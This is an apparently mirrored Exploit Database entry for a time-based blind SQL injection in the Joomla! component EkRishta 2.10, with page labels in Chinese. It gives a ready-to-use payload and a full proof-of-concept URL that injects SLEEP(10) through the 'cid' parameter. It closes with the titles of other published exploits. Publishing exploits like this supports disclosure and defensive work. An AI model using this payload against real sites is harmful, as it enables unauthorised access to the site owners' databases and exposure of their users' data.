Joomla! Component EkRishta 2.10 – ‘cid’ SQL Injection

Exploit Database
15 阅读

作者： 41!kh4224rDz

日期： 2018-06-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44869/

# # # #
# Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection 
# Dork: N/A
# Date: 08.06.2018
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extension/ek-rishta/
# Version: 2.10
# Tested on: WiN7_x64/
# video : https://youtu.be/UWGFVUU9AU0
# # # #
# Exploit Author: 41!kh4224rDz
# # # #
# ------------------------------SQL
Injection----------------------------------------
# POC:
# Parameter : user_detail&cid
# Payload : 1%' AND SLEEP(10)%23
#
# 1)
#
http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23
#
#
# # # #

last Exploits
Joomla! Component EkRishta 2.10 – ‘cid’ SQL Injection的更多信息

D-Link DSP-W w110 v1.05b01 – Multiple Vulnerabilities：
GLPi 0.90.2 – SQL Injection：
Joomla! Component Contact Form Maker 1.0.1 – SQL Injection：
Joomla! Component PayPal IPN for DOCman 3.1 – ‘id’ SQL Injection：
Specialized Data Systems Parent Connect 2010.04.11 – Multiple SQL Injections：
POS Codekop v2.0 – Authenticated Remote Code Execution (RCE)：
Class Scheduling System 1.0 – Multiple Stored XSS：
mBlogger 1.0.04 – ‘viewpost.php’ SQL Injection：